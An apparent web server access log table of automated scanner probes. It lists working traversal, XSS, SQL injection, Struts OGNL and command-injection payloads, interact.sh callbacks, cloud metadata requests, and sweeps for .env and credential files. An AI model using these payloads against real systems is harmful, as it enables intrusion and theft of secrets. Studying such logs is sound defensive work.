6 | GET | /kyc/.env |
HTTP/1.1 |
1 | GET | /lab.html?vpath=//interact[.]sh |
HTTP/1.1 |
1 | GET | /labkey/home/login-login.view |
HTTP/1.1 |
1 | GET | /language/en-GB/en-GB.xml |
HTTP/1.1 |
1 | GET | /language/lang |
HTTP/1.1 |
2 | GET | /laravel-filemanager/download?file=passwd&type&working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F |
HTTP/1.1 |
1 | GET | /laravel-filemanager?type=Files |
HTTP/1.1 |
3 | GET | /laravel/.env.local |
HTTP/1.1 |
3 | GET | /laravel/.env.production |
HTTP/1.1 |
3 | GET | /laravel/.env.staging |
HTTP/1.1 |
6 | GET | /laravel/.env |
HTTP/1.1 |
3 | GET | /laravel/core/.env.local |
HTTP/1.1 |
3 | GET | /laravel/core/.env.production |
HTTP/1.1 |
3 | GET | /laravel/core/.env.staging |
HTTP/1.1 |
6 | GET | /laravel/core/.env |
HTTP/1.1 |
2 | GET | /latest/meta-data/ |
HTTP/1.1 |
1 | GET | /lib../.git/config |
HTTP/1.1 |
1 | GET | /lib///....//....//....//....//....//....//....//....//etc//passwd |
HTTP/1.1 |
1 | GET | /lib/upgrade.txt |
HTTP/1.1 |
1 | GET | /libraries/joomla/database/ |
HTTP/1.1 |
1 | GET | /libs/cq/ui/content/dumplibs.html |
HTTP/1.1 |
1 | GET | /libs/granite/core/content/login.html |
HTTP/1.1 |
1 | GET | /libs/granite/core/content/login/favicon.ico |
HTTP/1.1 |
1 | GET | /libs/granite/offloading/content/view.html |
HTTP/1.1 |
2 | GET | /libs/granite/security/content/useradmin.html |
HTTP/1.1 |
1 | GET | /libs/granite/ui/content/dumplibs.html |
HTTP/1.1 |
1 | GET | /libs/granite/ui/content/dumplibs.rebuild.html |
HTTP/1.1 |
1 | GET | /libs/granite/ui/content/dumplibs.test.html |
HTTP/1.1 |
1 | GET | /libs/granite/ui/content/dumplibs.validate.html |
HTTP/1.1 |
1 | GET | /license.txt |
HTTP/1.1 |
4 | GET | /linusadmin-phpinfo.php |
HTTP/1.1 |
1 | GET | /linuxki/experimental/vis/kivis.php?pid=0echo%20STARTcat%20/etc/passwdecho%20END&type=kitrace |
HTTP/1.1 |
1 | GET | /liquibase |
HTTP/1.1 |
1 | GET | /listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
3 | GET | /live/.env.local |
HTTP/1.1 |
3 | GET | /live/.env.production |
HTTP/1.1 |
3 | GET | /live/.env.staging |
HTTP/1.1 |
3 | GET | /live/.env |
HTTP/1.1 |
1 | GET | /live_check.shtml |
HTTP/1.1 |
1 | GET | /live_mfg.shtml |
HTTP/1.1 |
2 | GET | /loadtextfile.htm |
HTTP/1.1 |
1 | GET | /local2prod.sh |
HTTP/1.1 |
2 | GET | /localhost.sql |
HTTP/1.1 |
1 | GET | /log.log |
HTTP/1.1 |
1 | GET | /log.txt |
HTTP/1.1 |
1 | GET | /log/debug.log |
HTTP/1.1 |
1 | GET | /log/development.log |
HTTP/1.1 |
1 | GET | /log/error.log |
HTTP/1.1 |
1 | GET | /log/errors.log |
HTTP/1.1 |
1 | GET | /log/firewall.log |
HTTP/1.1 |
1 | GET | /log/mobile.log |
HTTP/1.1 |
1 | GET | /log/system.log |
HTTP/1.1 |
1 | GET | /log/view?base=../../../../../../../../../../&filename=/windows/win.ini |
HTTP/1.1 |
1 | GET | /log/warn.log |
HTTP/1.1 |
1 | GET | /log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cscript%3E |
HTTP/1.1 |
1 | GET | /logfile?d=crossdomain.xml |
HTTP/1.1 |
2 | GET | /logfile |
HTTP/1.1 |
1 | GET | /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
HTTP/1.1 |
1 | GET | /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
HTTP/1.1 |
2 | GET | /login.htm |
HTTP/1.1 |
2 | GET | /login.html |
HTTP/1.1 |
3 | GET | /login.jsp |
HTTP/1.1 |
1 | GET | /login.php.bak |
HTTP/1.1 |
4 | GET | /login.php |
HTTP/1.1 |
1 | GET | /login.sh |
HTTP/1.1 |
1 | GET | /login.stm |
HTTP/1.1 |
1 | GET | /login.zul |
HTTP/1.1 |
1 | GET | /login/../../../etc/passwd |
HTTP/1.1 |
6 | GET | /login/ |
HTTP/1.1 |
1 | GET | /login/forgetpswd.php?loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&loginsys=1 |
HTTP/1.1 |
1 | GET | /login/home/login.view |
HTTP/1.1 |
1 | GET | /login/sls/auth |
HTTP/1.1 |
2 | GET | /login?login=lutron&password=lutron |
HTTP/1.1 |
1 | GET | /login?next=/ |
HTTP/1.1 |
1 | GET | /login?next=\\\\\\interact.sh |
HTTP/1.1 |
1 | GET | /login?next=http[:]//interact[.]sh/?app.scan/ |
HTTP/1.1 |
1 | GET | /login?next |
HTTP/1.1 |
1 | GET | /login_page.php |
HTTP/1.1 |
2 | GET | /login_up.php |
HTTP/1.1 |
9 | GET | /login |
HTTP/1.1 |
1 | GET | /logon/LogonPoint/custom.html |
HTTP/1.1 |
1 | GET | /logos_clients/1.php |
HTTP/1.1 |
1 | GET | /logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain) |
HTTP/1.1 |
1 | GET | /logs.txt |
HTTP/1.1 |
2 | GET | /logs/awstats.pl |
HTTP/1.1 |
1 | GET | /logs/development.log |
HTTP/1.1 |
1 | GET | /logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json |
HTTP/1.1 |
1 | GET | /logs/downloadMainLog?fname=../../../../../../..//etc/passwd |
HTTP/1.1 |
1 | GET | /logs/error.log |
HTTP/1.1 |
1 | GET | /logs/errors.log |
HTTP/1.1 |
1 | GET | /logs/production.log |
HTTP/1.1 |
1 | GET | /lostpassword.php/n4gap%2522%253E%253Cimg%2520src=a%2520onerror=alert%28%2522document.domain%2522%29%253E |
HTTP/1.1 |
1 | GET | /loyalty_enu/start.swe/%253E%2522%253E%252Fscript%253E%253Cscript%253Ealert%2528document.domain%2529%253C%252Fscript%253E |
HTTP/1.1 |
2 | GET | /lua/%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252f%252e%252ffind_prefs.lua.css |
HTTP/1.1 |
2 | GET | /lua/.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252f.%252ffind_prefs.lua.css |
HTTP/1.1 |
1 | GET | /lucee/lucees3ezf%253cimg%2520src%253da%2520onerror%253dalert%28%272LM9apvZptQFyea3tUBKQJ4oioq%27%29%253elujb7/admin/imgProcess.cfm |
HTTP/1.1 |
1 | GET | /lucee/lucees3ezf%253cimg%2520src%253da%2520onerror%253dalert%28%272LNn6WL8POr7piZq13oXG48rSo6%27%29%253elujb7/admin/imgProcess.cfm |
HTTP/1.1 |
1 | GET | /lucees3ezf%253cimg%2520src%253da%2520onerror%253dalert%28%272LM9apvZptQFyea3tUBKQJ4oioq%27%29%253elujb7/admin/imgProcess.cfm |
HTTP/1.1 |
1 | GET | /lucees3ezf%253cimg%2520src%253da%2520onerror%253dalert%28%272LNn6WL8POr7piZq13oXG48rSo6%27%29%253elujb7/admin/imgProcess.cfm |
HTTP/1.1 |
1 | GET | /m_login.htm |
HTTP/1.1 |
1 | GET | /magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C |
HTTP/1.1 |
1 | GET | /magmi/web/js/magmi_utils.js |
HTTP/1.1 |
1 | GET | /magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
3 | GET | /mailer/.env |
HTTP/1.1 |
1 | GET | /mailscanner/login.php |
HTTP/1.1 |
1 | GET | /mailsms/s?dumpConfig=/&func=ADMIN:appState |
HTTP/1.1 |
1 | GET | /main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E |
HTTP/1.1 |
1 | GET | /main/calendar/agenda_list.php?type=xss\"+onmouseover=alert(document.domain)+\" |
HTTP/1.1 |
1 | GET | /mainfile.php?Logon=%27%3Becho%20md5(TestPoc)%3B%27&_login=1&password=testpoc&username=test |
HTTP/1.1 |
1 | GET | /maint/modules/home/index.php?lang=english|cat%20/etc/passwd |
HTTP/1.1 |
1 | GET | /manage/fileDownloader?sec=1 |
HTTP/1.1 |
1 | GET | /manage/log/view?base=../../../../../../../../../../&filename=/etc/passwd |
HTTP/1.1 |
1 | GET | /manage/log/view?base=../../../../../../../../../../&filename=/windows/win.ini |
HTTP/1.1 |
10 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /manager/login.aspx |
HTTP/1.1 |
1 | GET | /manager/radius/server_ping.php?id=1&ip=127.0.0.1|cat%20/etc/passwd>../../2LM9bIiti31LvxuXNbsnapSWjQp.txt |
HTTP/1.1 |
2 | GET | /manager/signin |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
1 | GET | /manual/style/build.properties |
HTTP/1.1 |
3 | GET | /market/.env.local |
HTTP/1.1 |
3 | GET | /market/.env.production |
HTTP/1.1 |
3 | GET | /market/.env.staging |
HTTP/1.1 |
3 | GET | /market/.env |
HTTP/1.1 |
3 | GET | /marketing/.env.local |
HTTP/1.1 |
3 | GET | /marketing/.env.production |
HTTP/1.1 |
3 | GET | /marketing/.env.staging |
HTTP/1.1 |
3 | GET | /marketing/.env |
HTTP/1.1 |
1 | GET | /maximo/webclient/login/login.jsp |
HTTP/1.1 |
1 | GET | /mdocs-posts/?mdocs-img-preview=../../../wp-config.php |
HTTP/1.1 |
1 | GET | /media../.git/config |
HTTP/1.1 |
1 | GET | /media/favicons/favicon.png |
HTTP/1.1 |
1 | GET | /mediation/authenticate |
HTTP/1.1 |
1 | GET | /mediation/domains |
HTTP/1.1 |
1 | GET | /menu/guiw?id=3&nsbrand=1&nsvpx=phpinfo&protocol=nonexistent.1337\"> |
HTTP/1.1 |
1 | GET | /messages |
HTTP/1.1 |
3 | GET | /metadata/instance?api-version=2021-02-01 |
HTTP/1.1 |
1 | GET | /metadata/v1.json |
HTTP/1.1 |
1 | GET | /metrics/v1/mbeans |
HTTP/1.1 |
3 | GET | /metrics |
HTTP/1.1 |
1 | GET | /mgmt/shared/authn/login |
HTTP/1.1 |
1 | GET | /microstrategy7/Login.asp?Msg=%22%3E%3Cscript%3Ealert(/2LM9bfVeNV8Jj9QkM4aVhWMabdo/)%3B%3C%2Fscript%3E%3C&Port=0&Project=Project001&Server=Server001&Uid=Uid001 |
HTTP/1.1 |
1 | GET | /mifs/login.jsp |
HTTP/1.1 |
5 | GET | /miscadmin |
HTTP/1.1 |
1 | GET | /mobile.html |
HTTP/1.1 |
1 | GET | /mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337)//itms:// |
HTTP/1.1 |
1 | GET | /mobile/index.php |
HTTP/1.1 |
1 | GET | /modifica_cliente.php?idclienti=1&tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script> |
HTTP/1.1 |
1 | GET | /mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script> |
HTTP/1.1 |
1 | GET | /module/?class=x&data-show-ui=admin&from_url=http[:]//13[.]67[.]44[.]234&id=x&module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25height:100%25 |
HTTP/1.1 |
1 | GET | /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- |
HTTP/1.1 |
1 | GET | /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- |
HTTP/1.1 |
1 | GET | /module/smartblog/archive?day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-&month=1&year=1 |
HTTP/1.1 |
1 | GET | /modules/custom.xml |
HTTP/1.1 |
1 | GET | /monitoring/..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252fetc/passwd |
HTTP/1.1 |
2 | GET | /monitoring?graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&part=graph |
HTTP/1.1 |
3 | GET | /monitoring |
HTTP/1.1 |
1 | GET | /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /my.ppk |
HTTP/1.1 |
1 | GET | /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. |
HTTP/1.1 |
2 | GET | /mysql.sql |
HTTP/1.1 |
1 | GET | /mysqldump.sql |
HTTP/1.1 |
1 | GET | /nagios/side.php |
HTTP/1.1 |
1 | GET | /nagios3 |
HTTP/1.1 |
1 | GET | /nagios |
HTTP/1.1 |
1 | GET | /nagiosxi/login.php?redirect=/www.interact.sh |
HTTP/1.1 |
1 | GET | /nagiosxi/login.php |
HTTP/1.1 |
1 | GET | /nagvis/frontend/nagvis-js/index.php |
HTTP/1.1 |
1 | GET | /names.nsf/People?OpenView |
HTTP/1.1 |
2 | GET | /namespaces |
HTTP/1.1 |
1 | GET | /nbproject/project.properties |
HTTP/1.1 |
1 | GET | /neos/login |
HTTP/1.1 |
1 | GET | /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 |
HTTP/1.1 |
2 | GET | /network-login/ |
HTTP/1.1 |
3 | GET | /new/.env.local |
HTTP/1.1 |
3 | GET | /new/.env.production |
HTTP/1.1 |
3 | GET | /new/.env.staging |
HTTP/1.1 |
3 | GET | /new/.env |
HTTP/1.1 |
1 | GET | /newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /nextcloud/index.php/login |
HTTP/1.1 |
1 | GET | /nextcloud/login |
HTTP/1.1 |
2 | GET | /nifi-api/access/config |
HTTP/1.1 |
1 | GET | /node_modules/../../../../../etc/passwd |
HTTP/1.1 |
2 | GET | /node_modules/mqtt/test/helpers/ |
HTTP/1.1 |
1 | GET | /novius-os/admin/nos/login?redirect=http[:]//interact[.]sh |
HTTP/1.1 |
2 | GET | /npm-debug.log |
HTTP/1.1 |
1 | GET | /npm-shrinkwrap.json |
HTTP/1.1 |
2 | GET | /nuxeo/login.jsp |
HTTP/1.1 |
1 | GET | /oam/server/opensso/sessionservice |
HTTP/1.1 |
1 | GET | /oauth-credentials.json |
HTTP/1.1 |
2 | GET | /oauth/authorize?client_id=acme&redirect_uri=http[:]//test&response_type=${13337*73331}&scope=openid |
HTTP/1.1 |
2 | GET | /objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png |
HTTP/1.1 |
2 | GET | /objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg |
HTTP/1.1 |
2 | GET | /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg |
HTTP/1.1 |
2 | GET | /objects/nuclei.txt |
HTTP/1.1 |
1 | GET | /occ/v2/d2OzBcy |
HTTP/1.1 |
1 | GET | /ocsreports |
HTTP/1.1 |
3 | GET | /old/.env.local |
HTTP/1.1 |
3 | GET | /old/.env.production |
HTTP/1.1 |
3 | GET | /old/.env.staging |
HTTP/1.1 |
3 | GET | /old/.env |
HTTP/1.1 |
4 | GET | /old_phpinfo.php |
HTTP/1.1 |
2 | GET | /oliver/FileServlet?fileName=c:/windows/win.ini&source=serverFile |
HTTP/1.1 |
1 | GET | /omni_success?cmdb_edit_path=\")alert('nuclei')// |
HTTP/1.1 |
1 | GET | /onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ== |
HTTP/1.1 |
2 | GET | /opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik |
HTTP/1.1 |
1 | GET | /opc/v1/instance |
HTTP/1.1 |
1 | GET | /opcache-status/opcache.php |
HTTP/1.1 |
1 | GET | /openam/UI/Login |
HTTP/1.1 |
2 | GET | /openam/UI/ |
HTTP/1.1 |
1 | GET | /openam/XUI |
HTTP/1.1 |
2 | GET | /openam/oauth2/..;/ccversion/Version |
HTTP/1.1 |
1 | GET | /openam/ui/PWResetUserValidation |
HTTP/1.1 |
1 | GET | /openapi.json |
HTTP/1.1 |
1 | GET | /opennms/login.jsp |
HTTP/1.1 |
2 | GET | /opensso/UI/Login |
HTTP/1.1 |
1 | GET | /openstack/latest |
HTTP/1.1 |
1 | GET | /openvpn-monitor/ |
HTTP/1.1 |
1 | GET | /opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd |
HTTP/1.1 |
1 | GET | /osm/REGISTER.cmd |
HTTP/1.1 |
2 | GET | /osm_tiles/REGISTER.cmd |
HTTP/1.1 |
1 | GET | /ossim/session/login.php |
HTTP/1.1 |
1 | GET | /otobo/index.pl?Action=ExternalURLJumpURL=http[:]//www[.]interact[.]sh |
HTTP/1.1 |
2 | GET | /owa/auth/logon.aspx |
HTTP/1.1 |
2 | GET | /owa/auth/x.js |
HTTP/1.1 |
1 | GET | /owncloud/ |
HTTP/1.1 |
1 | GET | /owncloud/config/ |
HTTP/1.1 |
1 | GET | /package-lock.json |
HTTP/1.1 |
1 | GET | /packages.config |
HTTP/1.1 |
1 | GET | /pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1)%22%3E1%3C/img%3E |
HTTP/1.1 |
1 | GET | /pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini |
HTTP/1.1 |
1 | GET | /pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd |
HTTP/1.1 |
1 | GET | /page/exportImport/fileTransfer/2LNn5ozdnedpBknDTXJS1EwT9AS.jsp |
HTTP/1.1 |
2 | GET | /page/exportImport/fileTransfer/poc.jsp |
HTTP/1.1 |
1 | GET | /page?id=2LM9cwq4HFmctSmqtq6IAfSwD6L&settings[view%20options][outputFunctionName]=xprocess.mainModule.require(%27child_process%27).execSync(%27wget+http[:]//%27)s |
HTTP/1.1 |
1 | GET | /pages/UI.php |
HTTP/1.1 |
2 | GET | /pages/ |
HTTP/1.1 |
1 | GET | /pages/login |
HTTP/1.1 |
1 | GET | /pages/systemcall.php?command=cat%20/etc/passwd |
HTTP/1.1 |
1 | GET | /pages |
HTTP/1.1 |
2 | GET | /pagespeed-global-admin/ |
HTTP/1.1 |
1 | GET | /pandora_console/ajax.php?page=../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /pandora_console/attachment/pandora_chat.log.json.txt |
HTTP/1.1 |
1 | GET | /panel |
HTTP/1.1 |
1 | GET | /pantheon.upstream.yml |
HTTP/1.1 |
1 | GET | /parameters.yml.dist |
HTTP/1.1 |
1 | GET | /parameters.yml |
HTTP/1.1 |
1 | GET | /passport/index.php?action=manage&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mtype=userset |
HTTP/1.1 |
1 | GET | /password.cgi |
HTTP/1.1 |
1 | GET | /password.html |
HTTP/1.1 |
2 | GET | /passwordreset?bundle='alert(document.domain)var+ok=' |
HTTP/1.1 |
1 | GET | /payform.php?note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&price=123&t=1&type=upgrade&upgradegd=6&upgradeid=1 |
HTTP/1.1 |
2 | GET | /pdb/dashboard/index.html |
HTTP/1.1 |
1 | GET | /pdb/meta/v1/version |
HTTP/1.1 |
1 | GET | /pentaho/Login |
HTTP/1.1 |
1 | GET | /pentaho/api/userrolelist/systemRoles?require-cfg.js |
HTTP/1.1 |
1 | GET | /perl-status |
HTTP/1.1 |
3 | GET | /pfblockerng/www/index.php |
HTTP/1.1 |
1 | GET | /phinx.yml |
HTTP/1.1 |
1 | GET | /photo/combine.php?g=core-r7rules/../../../hello.php.&type=javascript |
HTTP/1.1 |
3 | GET | /php-info.php |
HTTP/1.1 |
1 | GET | /php-opcache-status/ |
HTTP/1.1 |
4 | GET | /php.ini |
HTTP/1.1 |
4 | GET | /php.php |
HTTP/1.1 |
1 | GET | /php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22 |
HTTP/1.1 |
1 | GET | /php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22 |
HTTP/1.1 |
1 | GET | /php/ping.php?hostname=|dir |
HTTP/1.1 |
1 | GET | /php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E |
HTTP/1.1 |
1 | GET | /phpMyAdmin/ |
HTTP/1.1 |
1 | GET | /phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00 |
HTTP/1.1 |
1 | GET | /php_info.php |
HTTP/1.1 |
4 | GET | /phpinfo.php |
HTTP/1.1 |
3 | GET | /phpinfo |
HTTP/1.1 |
1 | GET | /phpmyadmin/ |
HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php |
HTTP/1.1 |
2 | GET | /phpmyadmin/setup/index.php?id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mode=test&page=servers |
HTTP/1.1 |
1 | GET | /phpmyadmin/setup/index.php |
HTTP/1.1 |
1 | GET | /phpunit.xml |
HTTP/1.1 |
4 | GET | /phpversion.php |
HTTP/1.1 |
1 | GET | /phy.htm |
HTTP/1.1 |
1 | GET | /pics/logo_70x29px.gif |
HTTP/1.1 |
2 | GET | /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D |
HTTP/1.1 |
2 | GET | /pimcore/app/config/pimcore/google-api-private-key.json |
HTTP/1.1 |
4 | GET | /pinfo.php |
HTTP/1.1 |
1 | GET | /pipeline.yaml |
HTTP/1.1 |
1 | GET | /pki/images/keyManager_title.ico |
HTTP/1.1 |
2 | GET | /plesk-stat/ |
HTTP/1.1 |
1 | GET | /plugin/build-metrics/getBuildStats?Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&Submit=Search&causeFilter&causeFilteringType=ALL&jobFilter&jobFilteringType=ALL&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&launcherFilter&launcherFilteringType=ALL&nodeFilter&nodeFilteringType=ALL&range=2&rangeUnits=Weeks |
HTTP/1.1 |
1 | GET | /plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)> |
HTTP/1.1 |
1 | GET | /plugin |
HTTP/1.1 |
1 | GET | /plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa&view=menu |
HTTP/1.1 |
2 | GET | /plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml |
HTTP/1.1 |
1 | GET | /plugins/servlet/Wallboard/?cyclePeriod=alert(document.domain)&dashboardId=10000&dashboardId=10000 |
HTTP/1.1 |
1 | GET | /plugins/servlet/oauth/users/icon-uri?consumerUri=http[:]// |
HTTP/1.1 |
1 | GET | /plugins/servlet/oauth/view-consumer-info |
HTTP/1.1 |
1 | GET | /plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /plugins/weathermap/configs/poc.conf |
HTTP/1.1 |
2 | GET | /plugins/weathermap/editor.php?action=set_map_properties&debug=existing&link_bandwidth_in&link_bandwidth_out&link_hover&link_infourl&link_name&link_target&link_width&map_legend=Traffic+Load&map_linkdefaultwidth=7&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&mapname=poc.conf&node_hover&node_iconfilename=--NONE--&node_infourl&node_label&node_name&node_new_name&node_x&node_y¶m¶m2&plug=0 |
HTTP/1.1 |
1 | GET | /plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E |
HTTP/1.1 |
1 | GET | /plus/carbuyaction.php?code=../../&dopost=return |
HTTP/1.1 |
1 | GET | /plus/download.php?link=aHR0cHM6Ly9pbnRlcmFjdC5zaA==&open=1 |
HTTP/1.1 |
1 | GET | /plus/flink.php?c=cat%20/etc/passwd&dopost=save |
HTTP/1.1 |
1 | GET | /plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C |
HTTP/1.1 |
1 | GET | /pma/setup/index.php |
HTTP/1.1 |
1 | GET | /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei |
HTTP/1.1 |
2 | GET | /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik |
HTTP/1.1 |
2 | GET | /pme/database/pme/phinx.yml |
HTTP/1.1 |
2 | GET | /pme/media/ |
HTTP/1.1 |
1 | GET | /poc.jsp?cmd=cat+%2Fetc%2Fpasswd |
HTTP/1.1 |
3 | GET | /portal/.env.local |
